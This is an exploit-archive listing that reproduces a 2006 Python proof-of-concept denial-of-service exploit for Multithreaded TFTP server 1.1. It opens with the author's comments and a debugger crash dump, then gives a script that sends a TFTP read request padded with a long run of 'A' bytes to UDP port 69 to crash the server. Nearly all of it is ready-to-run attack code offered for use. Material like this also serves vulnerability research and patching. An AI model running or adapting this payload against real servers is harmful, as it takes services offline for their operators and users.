Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit

2006-09-08T00:00:00
ID 1337DAY-ID-6200
Type zdt
Reporter n00b
Modified 2006-09-08T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ======================================================================
Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit
======================================================================




#!/usr/bin/python
#Multithreaded TFTP 1.1 Server d0s exploit by n00b
#the following is affected causing a denial of service
#Due to an overly long GET request to the ftp server
###########################################################################

#Tested on winx xp sp1,sp2 eng.
#Vendor dont know but s00n will :p
#n00b is credited for finding this dos exploit.
#Vendor web site:http://sourceforge.net/projects/tftp-server/
#Im sry if it look's a little messy as python isn't
#my strong point.Also i would like to thank milw0rm for
#all there help over the year's and to ignted's.com
#And also big shout to <Aelphaeis Mangarae> And any-one else i forgot ^ ^.
############################################################################

#                            \\DEBUG INF0//
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=77c5a76e ebx=77c5a7a0 ecx=77c318f2 edx=77c5cac8 esi=00407253 edi=41414141

#eip=77c44257 esp=00f9ff20 ebp=00f9ff2c iopl=0         nv up ei pl nz na
po nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206

#*** ERROR: Symbol file could not be found.  Defaulted to export symbols.

#msvcrt!wcsxfrm+0x11d:
#77c44257 8a27             mov     ah,[edi]                ds:0023:41414141=??
############################################################################


import socket
# Set up a UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# send
n00bstring ='''\x00\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
              \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
           '''

HOSTNAME = '127.0.0.1'
PORTNO = 69
s.connect((HOSTNAME, PORTNO))
if len(n00bstring) != s.send(n00bstring):
   # where to get error message "$!".
   print "cannot send to %s(%d):" % (HOSTNAME,PORTNO)
   raise SystemExit(1)
MAXLEN = 1024
(data,addr) = s.recvfrom(MAXLEN)
s.close()
print '%s(%d) said "%s"' % (addr[0],addr[1], data)



#  0day.today [2018-01-09]  #